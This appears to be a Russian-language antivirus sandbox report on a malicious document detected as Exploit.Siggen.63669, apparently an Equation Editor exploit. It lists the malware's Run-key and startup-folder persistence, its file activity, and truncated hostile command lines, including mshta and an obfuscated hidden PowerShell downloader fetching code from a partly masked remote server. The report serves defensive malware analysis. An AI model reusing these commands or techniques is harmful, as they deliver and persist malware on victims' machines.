Exploit.Siggen.63669

Для обеспечения автозапуска и распространения

Модифицирует следующие ключи реестра

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\SyncAppvPublishingServer.vbs'

Создает или изменяет следующие файлы

%APPDATA%\microsoft\windows\start menu\programs\startup\syncappvpublishingserver.vbs

Вредоносные функции

Загружает файлы и запускает на исполнение.

Запускает на исполнение (эксплоит)

'%WINDIR%\syswow64\mshta.exe' http://19#.##.255.65:8787/FuckYou &AAAC
'<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SyncAppvPublishingServer.vbs"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $JHSBHUDIYGFHBJYFGBHJKUYTFGVBFDDHUJ=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,1...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\SyncAppvPublishingServer.vbs'

Внедряет код в

следующие системные процессы:

Изменения в файловой системе

Создает следующие файлы

%APPDATA%\microsoft\internet explorer\quick launch\user pinned\syncappvpublishingserver.vbs
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\470e1f37b25773e9d27023e9f6b82a96_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\3494ee959b09ab6b8d0dc90864d9afcb_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\ec127debc14312a5fc4ede5fc784731e_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\7b330ee3e7075a2a700e5c11ef01c5d5_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\932655404f96bbd053debc346d8ffa6f_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\97185787b3593883eebcbb0508c649df_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\6e735676d9f377d47e9a5d2386ef29d8_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\329df58cd94463f831c350cf9b65bd2a_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\d05108c424074d0d7085dbd9c959f1ce_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee

Удаляет следующие файлы

%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\470e1f37b25773e9d27023e9f6b82a96_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\3494ee959b09ab6b8d0dc90864d9afcb_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\ec127debc14312a5fc4ede5fc784731e_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\7b330ee3e7075a2a700e5c11ef01c5d5_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\932655404f96bbd053debc346d8ffa6f_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\97185787b3593883eebcbb0508c649df_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\6e735676d9f377d47e9a5d2386ef29d8_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\329df58cd94463f831c350cf9b65bd2a_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
%APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\d05108c424074d0d7085dbd9c959f1ce_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee

Сетевая активность

TCP

Запросы HTTP GET

http://19#.##.255.65:8787/FuckYou via 19#.#9.255.65
http://19#.##.255.65:8787/_Incapsula_Resource?SW############################ via 19#.#9.255.65
http://19#.##.255.65:8787/_Incapsula_Resource?SW############################# via 19#.#9.255.65
http://19#.##.255.65:8787/get via 19#.#9.255.65
http://www.m9#.net/uploads/15871314451.jpg
http://19#.##.255.65:8787/cm/DXFQO-img.jpeg via 19#.#9.255.65
http://www.m9#.net/uploads/15871310001.jpg
http://www.m9#.net/uploads/15871310002.jpg

UDP

Другое

Создает и запускает на исполнение

'%WINDIR%\syswow64\mshta.exe' http://19#.##.255.65:8787/FuckYou &AAAC' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -w 1 -c $NUMBEROFWMIHIGHPERFORMANCEPROVIDERRETURNEDBYWMIADAPTER=New-Object Net.WebClient;$NUMBEROFWMIHIGHPERFORMANCEPROVIDERRETURNEDBYWMIADAPTER.proxy=[<#000#>Net.WebRequest<#000#>...' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $JHSBHUDIYGFHBJYFGBHJKUYTFGVBFDDHUJ=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,1...' (со скрытым окном)
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\SyncAppvPublishingServer.vbs'' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /C CopY "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SyncAppvPublishingServer.vbs" "%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned" /Y' (со скрытым окном)

Запускает на исполнение

'%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
'<SYSTEM32>\winlogon.exe' -legacy_Vista
'<SYSTEM32>\cmd.exe' /C CopY "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SyncAppvPublishingServer.vbs" "%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned" /Y
'%WINDIR%\microsoft.net\framework\v2.0.50727\aspnet_regsql.exe'
'%WINDIR%\microsoft.net\framework\v2.0.50727\dw20.exe' -x -s 388